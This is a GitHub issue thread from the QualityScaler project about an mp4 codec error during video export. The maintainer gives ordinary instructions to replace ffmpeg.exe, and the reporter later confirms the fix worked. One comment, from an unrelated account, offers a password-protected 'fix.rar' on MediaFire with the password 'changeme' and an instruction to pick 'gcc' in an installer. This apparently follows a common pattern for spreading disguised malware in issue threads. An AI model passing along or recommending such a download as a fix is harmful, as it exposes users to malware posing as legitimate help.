### ISSUE TITLE
Problem with the codecs and I can't rescale

### ISSUE THREAD

**Issue by sandrojclic** [Djdefrag/QualityScaler#94]
Hello. I run and get the following error: b'[mp4 @ 000001cc556ddac0] Could not find tag for codec pcm_s16le in stream #1, codec not currently supported in container\r\nCould not write header for output file #0 (incorrect codec parameters ?): Invalid argument\r\nError initializing output stream 0:0 -- \r\n'

The video export failed, possibly because the codec specified for the video (libx264) is not compatible with the given extension (mp4). Please specify a valid 'codec' argument in write_videofile. This would be 'libx264' or 'mpeg4' for mp4, 'libtheora' for ogv, 'libvpx for webm. Another possible reason is that the audio codec was not compatible with the video codec. For instance the video extensions 'ogv' and 'webm' only allow 'libvorbis' (default) as avideo codec.

**Comment by Djdefrag** [comment]
Hi my friend,

Probably you need to download new version of ffmpeg.exe and put it in QualityScaler/Assets folder. (unfortunately I can't upload the new version to github because it weighs too much and github won't let me)

1. Go to this site (https://www.gyan.dev/ffmpeg/builds/)
2. Download one of this zip
![359510912-465cb92a-8850-4445-8025-02db15b25789](https://github.com/user-attachments/assets/4dc082ca-9c47-45af-bb91-56546527827e)

3. Extract ffmpeg.exe from the downloaded .zip
4. Copy ffmpeg.exe to QualityScaler/Assets

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sandrojclic** [comment]
It seems that the problem is resolved. Thank you very much for your kind and quick response. And congratulations for such an excellent program.

**Comment by Djdefrag** [comment]
Hi my friend,

thank you, I appreciate it very much :)
